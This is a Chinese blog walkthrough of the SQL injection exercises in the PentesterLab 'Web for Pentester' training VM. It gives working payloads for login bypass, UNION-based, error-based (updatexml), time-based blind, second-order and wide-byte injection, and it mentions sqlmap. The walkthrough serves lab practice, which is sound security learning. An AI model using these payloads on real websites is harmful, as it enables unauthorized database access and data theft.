PentesterLab靶场sql注入流程
环境安装
随便在网上找了个Pentester的靶场,结果是2013年的,那就从2013年的这个靶场开始学习
下载镜像的地址:
https://pentesterlab.com/exercises/web_for_pentester_II/iso
正常找个虚拟机,进行iso的安装
安装完成后,查下虚拟机的IP,直接访问即可http://192.168.29.129/
sql注入
Example 1
万能密码:
自己尝试了几个密码,筛选出了这几个通关的,亲试可用:
admin'or 1=1#
"or"="a'='a
a'or' 1=1--
'or''='
用户名和密码都填一样的,点击提交通关
Example 2
通过order by语句确定字段的长度为3 --此处需要浏览此文的人自行学习,免得就无难度了
加粗部分为所需要填的注入语句,访问后通关
http://192.168.29.129/sqlinjection/example2/?username=1' union select 1,2,3 --+&password=2&submit=%E6%8F%90%E4%BA%A4
Example 3
去猜他的sql语句大概
select * from users where username='a' and password='b'
在尝试过程中发现使用单引号没有作用
尝试去构造及规避:
select * from users where username='\' and password=' or 1=1#'
用\做用户名,or 1=1#做密码直接登录
说白了就是执行了这段:
SELECT * FROM users where username="x" or 1=1#"
Example 4
在通过尝试发现界面会返回错误后,可以使用报错注入
案例4可以尝试报错注入:
http://192.168.29.129/sqlinjection/example4/?req=username and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)
以此类推,找到其他需要的信息
Example 5
起初用order by 来爆字段长度,结果发现一直报错
如果order by无法使用则直接上union 用字段来尝试破试出长度,发现长度就是之前试出来的3
union select 1,2,3
增加一个长度4,报错:
之后修改数字1,2的信息即可:
直接暴库即可,直接拿sqlmap去爆它,我这边有篇sqlmap的文章,可以看我的安全专栏里面有介绍:
Example 6
同样先爆字段长度用order by,发现这个可以爆,长度是3
之后再用union思路一样:
Example 7
属于时间盲注,此处界面没有显示信息的地方,只能通过猜字段的形式来进行
通过大于、小于、等于来进行,发现本库的字段为21
http://192.168.29.129/sqlinjection/example7/?id=1 and if(length(database())=21,sleep(5),1) --+
通过sqlmap爆一下,判断出来能注入后直接爆:
Example 8
此处的案例是二次注入,使用
a' union select 1,2,3# 进行二次注入:
查询列表,爆url,通过dirsearch爆出目录users,虽然是500但证明存在这个目录:
尝试列表中的数字,发现4可以进行注入:
Example 9
宽字节注入尝试,对于mysql数据库的测试:
发现存在注入,添加成功
%df%27%20or%201=1%23
大家可以安装后自己尝试,sql注入对于现在大厂基本上已经防的很厉害了,所以大家可以学习下安全漏洞相关的思路,也可以应用于其他功能测试中,用于验证功能异常。
希望对大家有帮助!
PentesterLab靶场sql注入流程相关推荐
- Pikachu靶场—sql注入通关
Pikachu靶场-SQL注入篇 前言 一.数字型注入 二.字符型注入 三.搜索型注入 四.XX型注入 五.insert注入 六.delete注入 七.http header注入 八.盲注:基于布尔盲 ...
- Pikachu靶场-SQL注入-搜索型注入过关步骤
Pikachu靶场-SQL注入-搜索型注入过关步骤 首先要明白MySQL数据库模糊搜索的语句,like '常%'.like '%常'.like '%常%' 这个几个,这里就不详说这个语句了 判断注入点 ...
- iwebsec靶场 SQL注入漏洞通关笔记4- sleep注入(时间型盲注)
系列文章目录 iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入_mooyuan的博客-CSDN博客 iwebsec靶场 SQL注入漏洞通关笔记2- 字符型注入(宽字节注入)_mooyuan的 ...
- JAVA代码审计之WebGoat靶场SQL注入
文章目录 前言 WebGoat IDEA部署靶场 No.1 回显注入 No.2 布尔盲注 No.3 Order by 代审技巧 SQL注入挖掘 SQL注入防御 Fortify体验 总结 前言 为了从自 ...
- supersqli(SQL注入流程及常用SQL语句)
目录 一.SQL注入知识学习 1.判断注入类型 (1)数字型注入判断 (2)字符型注入判断 2.猜解sql查询语句中的字段数(order by 的使用) 3.判断显示位爆数据库的名字 4.注释(--+ ...
- 测试具有44个漏洞点的简单小靶场-SQL注入篇
文章目录 本地搭建 SQL注入篇 注入1(数字型注入) 注入2(闭合单引号) 注入3(闭合双引号) 注入4(闭合括号) 注入5(报错注入) 注入6(布尔盲注) 注入7(过滤了'--'和'#'以及'%2 ...
- oracle 注入靶场,pick靶场-sql注入
甲.数字型注入 数字型注入一般提交值没有引号,所以直接在后面构造语句就可以了. 抓包查看 构造语句 提交后 该数据库表内容被爆出来了. 乙.字符型注入 首先我们要知道一点,字符串在数据库中提交是需要用 ...
- sqli-labs第五关sql注入流程
正常访问 http://127.0.0.1/sqli-labs-master/less-5/?id=1 判断注入类型 http://127.0.0.1/sqli-labs-master/less-5/ ...
- sql注入 练手网站_靶场sql注入练手----sqlmap篇(纯手打)
绝大数情况下,管理员的账号密码都在admin表里 查询字段名 构造 ?id=1 and 1=2 union select 1,column_name from information_schema.c ...
最新文章
- 从大规模文献库中实现生物医学关系抽取
- 赫夫曼树建立c语言源程序编译结果详细解释,哈夫曼树的建立与实现最终版(备份存档)...
- lamp安装指南(转)
- 记一次synchronized锁字符串引发的坑兼再谈Java字符串
- 聊聊storm nimbus的LeaderElector
- .NET Core 3中的性能提升(译文)
- jdk8切换成jdk6_运行中的JDK语言功能预览:切换表达式
- 修改Cocos2d-X-3.2中的setup.py, 使其能用python3
- Gartner:2022年全球IT支出将超4万亿美元,软件增速最高
- procyon java8_java jdk 8反编译工具JD-GUI、procyon-decompiler、luyten、crf下载使用简介
- oracle ogg11.2下载,ogg config for sqlserver 2012 to oracle 11.2(ogg 12.1 to 12.2)
- 卡巴斯基7.0离线更新升级包病毒库
- php sql注入防御方法,php怎么防御sql注入
- DX11梯台旋转运动
- Oracle中Minus的使用
- 总结 | 人生如逆旅,我亦是行人
- 基于Spark的电商用户行为分析系统的设计与实现
- 计算机社团活动照片,电脑绘画兴趣小组活动记录表Word版
- 各大邮箱网址用哪个好?企业内部邮箱哪个比较好用?
- C语言_函数递归举例
热门文章
- 保研面试/考研复试概率论与数理统计问题整理
- 【runloop】performSelector方法探究
- 服务器系统2003资源监视器在哪里,系统资源监视器在哪里
- iphone补电代码大全_手机资讯:iPhone ICCID激活策略和运营商查询地址大全
- Capture One pro 21 for Mac(RAW转换和图像编辑工具)
- Vc++ - mfc - 象棋(末)- 网络象棋
- GridView分页实现
- 小鱼易连发布全新智能会议终端产品 引领云视频会议市场
- 使用z-file和七牛云对象存储构建个人网盘
- vue-infinite-scroll无限滚动组件